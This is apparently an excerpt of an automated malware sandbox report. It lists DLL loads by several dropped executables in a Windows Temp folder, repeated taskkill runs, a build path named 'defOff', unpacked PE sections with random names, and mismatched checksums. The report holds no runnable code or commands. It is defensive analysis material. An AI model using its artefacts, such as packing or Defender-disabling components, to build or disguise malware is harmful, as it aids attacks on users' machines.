Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 2949632 > 1048576
Source: file.exe Static PE information: Raw size of czpsekko is bigger than: 0x100000 < 0x2a6c00
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe, 00000006.00000003.2371701533.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, M0SHVBI03XTU9LNHD2O8UA8TC8F.exe, 00000006.00000002.2505556141.0000000000A92000.00000040.00000001.01000000.0000000B.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Unpacked PE file: 3.2.ST44OD0PMG8MCMYJRN4.exe.130000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wehliqok:EW;xquxcvvg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wehliqok:EW;xquxcvvg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Unpacked PE file: 4.2.9NWW1UIUAOJA8NFOZHWEDA.exe.4a0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;letztgfz:EW;rrfcshya:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;letztgfz:EW;rrfcshya:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 5.2.skotes.exe.790000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wehliqok:EW;xquxcvvg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wehliqok:EW;xquxcvvg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Unpacked PE file: 6.2.M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.a90000.0.unpack :EW;.rsrc:W;.idata :W;pnhiajhq:EW;lwmvjhen:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Unpacked PE file: 11.2.26e226f915.exe.830000.0.unpack :EW;.rsrc :W;.idata :W;czpsekko:EW;spvyrroo:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;czpsekko:EW;spvyrroo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Unpacked PE file: 12.2.ef2532c0b1.exe.40000.0.unpack :EW;.rsrc :W;.idata :W; :EW;letztgfz:EW;rrfcshya:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;letztgfz:EW;rrfcshya:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Unpacked PE file: 33.2.ef2532c0b1.exe.40000.0.unpack :EW;.rsrc :W;.idata :W; :EW;letztgfz:EW;rrfcshya:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;letztgfz:EW;rrfcshya:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: real checksum: 0x1ce631 should be: 0x1cb159
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: real checksum: 0x1c56a1 should be: 0x1cad2c
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: real checksum: 0x1ce631 should be: 0x1cb159
Source: random[1].exe.9.dr Static PE information: real checksum: 0x2d063f should be: 0x2d27d6
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: real checksum: 0x1ce631 should be: 0x1cb159
Source: num.exe.9.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: ef2532c0b1.exe.9.dr Static PE information: real checksum: 0x1c56a1 should be: 0x1cad2c
Source: random[1].exe0.9.dr Static PE information: real checksum: 0x1c56a1 should be: 0x1cad2c
Source: file.exe Static PE information: real checksum: 0x2d063f should be: 0x2d27d6
Source: 26e226f915.exe.9.dr Static PE information: real checksum: 0x2d063f should be: 0x2d27d6
Source: skotes.exe.3.dr Static PE information: real checksum: 0x1ce631 should be: 0x1cb159
Source: 1USEAVXFST1CCUTT4RKEBB0FQ1.exe.13.dr Static PE information: real checksum: 0x2c1234 should be: 0x2bb468
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: real checksum: 0x1c56a1 should be: 0x1cad2c
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.0.dr Static PE information: real checksum: 0x2c1234 should be: 0x2bb468
Source: num[1].exe.9.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: czpsekko
Source: file.exe Static PE information: section name: spvyrroo
Source: file.exe Static PE information: section name: .taggant
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name:
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name: .idata
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name:
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name: wehliqok
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name: xquxcvvg
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name: .taggant
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name:
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name: .rsrc
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name: .idata
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name:
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name: letztgfz
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name: rrfcshya
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name: .taggant
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.0.dr Static PE information: section name:
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.0.dr Static PE information: section name: .idata
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.0.dr Static PE information: section name: pnhiajhq
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.0.dr Static PE information: section name: lwmvjhen
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: wehliqok
Source: skotes.exe.3.dr Static PE information: section name: xquxcvvg
Source: skotes.exe.3.dr Static PE information: section name: .taggant
Source: random[1].exe.9.dr Static PE information: section name:
Source: random[1].exe.9.dr Static PE information: section name: .rsrc
Source: random[1].exe.9.dr Static PE information: section name: .idata
Source: random[1].exe.9.dr Static PE information: section name: czpsekko
Source: random[1].exe.9.dr Static PE information: section name: spvyrroo
Source: random[1].exe.9.dr Static PE information: section name: .taggant
Source: 26e226f915.exe.9.dr Static PE information: section name:
Source: 26e226f915.exe.9.dr Static PE information: section name: .rsrc
Source: 26e226f915.exe.9.dr Static PE information: section name: .idata
Source: 26e226f915.exe.9.dr Static PE information: section name: czpsekko
Source: 26e226f915.exe.9.dr Static PE information: section name: spvyrroo
Source: 26e226f915.exe.9.dr Static PE information: section name: .taggant
Source: random[1].exe0.9.dr Static PE information: section name:
Source: random[1].exe0.9.dr Static PE information: section name: .rsrc
Source: random[1].exe0.9.dr Static PE information: section name: .idata
Source: random[1].exe0.9.dr Static PE information: section name:
Source: random[1].exe0.9.dr Static PE information: section name: letztgfz
Source: random[1].exe0.9.dr Static PE information: section name: rrfcshya
Source: random[1].exe0.9.dr Static PE information: section name: .taggant
Source: ef2532c0b1.exe.9.dr Static PE information: section name:
Source: ef2532c0b1.exe.9.dr Static PE information: section name: .rsrc
Source: ef2532c0b1.exe.9.dr Static PE information: section name: .idata
Source: ef2532c0b1.exe.9.dr Static PE information: section name:
Source: ef2532c0b1.exe.9.dr Static PE information: section name: letztgfz
Source: ef2532c0b1.exe.9.dr Static PE information: section name: rrfcshya
Source: ef2532c0b1.exe.9.dr Static PE information: section name: .taggant
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name:
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name: .idata
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name:
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name: wehliqok
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name: xquxcvvg
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name: .taggant
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name:
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name: .rsrc
